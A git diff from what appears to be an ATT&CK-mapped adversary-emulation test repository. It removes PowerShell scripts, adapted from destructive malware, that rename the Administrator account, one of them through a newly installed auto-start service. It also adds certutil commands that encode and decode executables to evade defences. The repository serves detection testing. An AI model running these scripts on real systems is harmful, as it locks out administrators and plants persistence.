diff --git a/Windows/Credential_Access/Account Manipulation b/Windows/Credential_Access/Account Manipulation
deleted file mode 100644
index 503e355d..00000000
--- a/Windows/Credential_Access/Account Manipulation
+++ /dev/null
@@ -1,62 +0,0 @@
-# Account Manipulation
-
-MITRE ATT&CK Technique: [T1098](https://attack.mitre.org/wiki/Technique/T1098)
-
-Adapted from [Operation Blockbuster](https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf)
-
-## Example 1
-
-If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 16 digits.
-
- $x = Get-Random -Minimum 2 -Maximum 9999
- $y = Get-Random -Minimum 2 -Maximum 9999
- $z = Get-Random -Minimum 2 -Maximum 9999
- $w = Get-Random -Minimum 2 -Maximum 9999
- Write-Host HaHaHa_$x$y$z$w
-
- $hostname = (Get-CIMInstance CIM_ComputerSystem).Name
-
- $fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
-
- foreach($member in $fmm) {
- if($member -like "*Administrator*") {
- Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
- Write-Host "Successfully Renamed Administrator Account on" $hostname
- }
- }
-
- ## Example 2
-
-If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 8 digits.
-
- $x = Get-Random -Minimum 2 -Maximum 99
- $y = Get-Random -Minimum 2 -Maximum 99
- $z = Get-Random -Minimum 2 -Maximum 99
- $w = Get-Random -Minimum 2 -Maximum 99
- $newadmin = "HaHaHa_$x$y$z$w".ToString()
-
- $serviceName = "Rename Account Service"
- $serviceDisplayName = "Rename Account Service"
- $serviceDescription = "Rename Account Service"
- $serviceExecutable = "wmic useraccount where name='Administrator' rename '$newadmin'"
-
- if (Get-Service $serviceName -ErrorAction SilentlyContinue)
- {
- $serviceToRemove = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'"
- $serviceToRemove | Stop-Service
- $serviceToRemove.delete()
- }
- else
- {
- "service does not exists"
- }
-
- Write-Host "Installing service: $serviceName"
- New-Service -name $serviceName -displayName $serviceDisplayName -binaryPathName $serviceExecutable -startupType Automatic -Description $serviceDescription
- Write-Host "Installation completed: $serviceName"
-
- Write-Host "Trying to start new service: $serviceName"
-
- $serviceToStart = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'"
- $serviceToStart.startservice()
- Write-Host "Service started: $serviceName"
diff --git a/Windows/Credential_Access/Create Account.md b/Windows/Credential_Access/Create_Account.md
similarity index 100%
rename from Windows/Credential_Access/Create Account.md
rename to Windows/Credential_Access/Create_Account.md
diff --git a/Windows/Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md b/Windows/Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md
index cc08ef0e..7b9f2d75
--- a/Windows/Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md
+++ b/Windows/Defense Evasion/Deobfuscate_Decode_Files_Or_Information.md
@@ -3,7 +3,9 @@ MITRE ATT&CK Technique: [T1140](https://attack.mitre.org/wiki/Technique/T1140) ## Example encode executable + certutil.exe -encode file.exe file.txt ## Example decode executable + certutil.exe -decode file.txt file.exe
diff --git a/Windows/Discovery/Query_Registry.md b/Windows/Discovery/Query_Registry.md
index 4c0747c3..34f3e666
--- a/Windows/Discovery/Query_Registry.md
+++ b/Windows/Discovery/Query_Registry.md
@@ -27,9 +27,11 @@ Use the following command (as Administrator) to view the drivers configured to l
 Reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
-Reference: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
+References:
-Reference: https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
+https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
+
+https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services
@@ -41,6 +43,8 @@ Reference: https://blog.cylance.com/windows-registry-persistence-part-1-introduc
 reg import [FileName ]
 reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )
-Reference: http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
+References:
-Reference: https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
+http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf
+
+https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf
diff --git a/Windows/README.md b/Windows/README.md
index 422fa4f4..3cf59f94
--- a/Windows/README.md
+++ b/Windows/README.md
@@ -4,7 +4,7 @@
 |-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
 | [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port |
 | [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media |
-| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create%20Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | [Clipboard Data](Collection/Clipboard_Data.md) | Data Encrypted | Connection Proxy |
+| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create_Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | [Clipboard Data](Collection/Clipboard_Data.md) | Data Encrypted | Connection Proxy |
 | Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
 | Bootkit | Bypass User Account Control | Component Firmware | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Share Discovery | Pass the Ticket | Graphical User Interface | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
 | [Change Default File Association](Persistence/Change_Default_File_Association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |